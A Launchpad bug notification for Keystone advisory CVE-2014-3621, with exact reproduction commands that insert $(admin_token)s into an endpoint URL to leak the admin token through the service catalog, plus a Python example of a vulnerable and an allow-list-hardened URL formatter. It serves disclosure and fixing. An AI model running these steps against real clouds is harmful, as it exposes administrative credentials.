[Bug 1354208] Re: [OSSA 2014-029] Catalog replacement allows reading config (CVE-2014-3621)
** Changed in: keystone
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1354208
Title:
[OSSA 2014-029] Catalog replacement allows reading config (CVE-2014-3621)
Status in OpenStack Identity (Keystone):
Fix Released
Status in Keystone havana series:
Fix Released
Status in Keystone icehouse series:
Fix Committed
Status in OpenStack Security Advisories:
Fix Released
Bug description:
Anyone that can create endpoints can read any value out of the config file. Some of the values in the config file are passwords and things that shouldn't be made available.
For example, I'm running a cloud and I allow someone to define their
own endpoints for whatever reason... maybe they control their own
subcloud. If the admin creates an endpoint with $(admin_token), then
queries the catalog, they can read the admin token out of the config
file.
I don't know what the fix is. Maybe a whitelist of config options?
Maybe leaving "secret=True" config options out of the dict is good
enough?
Here are the steps to recreate:
$ openstack service create --type test test
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | None                             |
| enabled     | True                             |
| id          | 9251fab0a273454d84046c810b3503a7 |
| name        | test                             |
| type        | test                             |
+-------------+----------------------------------+
# Define an endpoint with $(admin_token)s.
$ openstack endpoint create 9251fab0a273454d84046c810b3503a7 --publicurl 'http://something/$(admin_token)s'
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| id           | 164abc0b305e4ad998ac732cda569cd6 |
| publicurl    | http://something/$(admin_token)s |
| region       | None                             |
| service_id   | 9251fab0a273454d84046c810b3503a7 |
| service_name | test                             |
| service_type | test                             |
+--------------+----------------------------------+
# Get a scoped token using curl.
$ curl -i -H "Content-Type: application/json" -d '
{ "auth": {
    "identity": {
      "methods": ["password"],
      "password": {
        "user": {
          "name": "admin",
          "domain": { "id": "default" },
          "password": "mypassword"
        }
      }
    },
    "scope": {
      "project": {
        "name": "demo",
        "domain": { "id": "default" }
      }
    }
  }
}' http://localhost:35357/v3/auth/tokens ; echo
... Look for the admin token in the catalog in the response:
{"endpoints": [{"url": "http://something/myadmintoken",
...
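The whitelist the reporter floats above, as an added Python example that is not Keystone's code: a catalog URL formatter expands $(name)s placeholders against a dict of config values, so the vulnerable version hands every option (including admin_token) to the template, while the hardened version substitutes only an explicit allow-list and rejects any other placeholder. The config values, the allow-list contents and the function names are constructed for illustration.

```python
import re

# Constructed stand-in for the loaded config; a real deployment reads keystone.conf.
CONFIG = {
    "admin_token": "myadmintoken",   # secret: must never be reachable from a URL template
    "public_port": "5000",
    "admin_port": "35357",
    "public_bind_host": "0.0.0.0",
}

# Per-request values that catalog URLs legitimately reference.
REQUEST_CONTEXT = {"tenant_id": "demo-project-id", "user_id": "admin-user-id"}

# Hypothetical allow-list: the only names an endpoint URL may substitute.
ALLOWED_KEYS = frozenset(
    {"tenant_id", "user_id", "public_port", "admin_port", "public_bind_host"}
)

# Matches the $(name)s placeholder syntax used in the bug report.
PLACEHOLDER = re.compile(r"\$\((\w+)\)s")


def format_url_vulnerable(url, context):
    """Before the fix: the whole config dict is exposed to %-formatting."""
    values = dict(CONFIG)
    values.update(context)
    # $(name)s is rewritten to %(name)s and expanded with Python %-formatting.
    return url.replace("$(", "%(") % values


class MalformedEndpoint(ValueError):
    """Raised when an endpoint URL references a key outside the allow-list."""


def format_url_hardened(url, context):
    """After the fix: only allow-listed keys are substituted; others are rejected."""
    referenced = set(PLACEHOLDER.findall(url))
    disallowed = referenced - ALLOWED_KEYS
    if disallowed:
        raise MalformedEndpoint(
            "endpoint %r references disallowed keys: %s" % (url, sorted(disallowed))
        )
    # Build the substitution dict from the allow-list only, never from CONFIG wholesale.
    values = {k: CONFIG[k] for k in ALLOWED_KEYS if k in CONFIG}
    values.update(context)
    return url.replace("$(", "%(") % values
```

Validating the template at endpoint creation time, with the same allow-list, lets the deployment reject a bad URL before it is ever stored in the catalog.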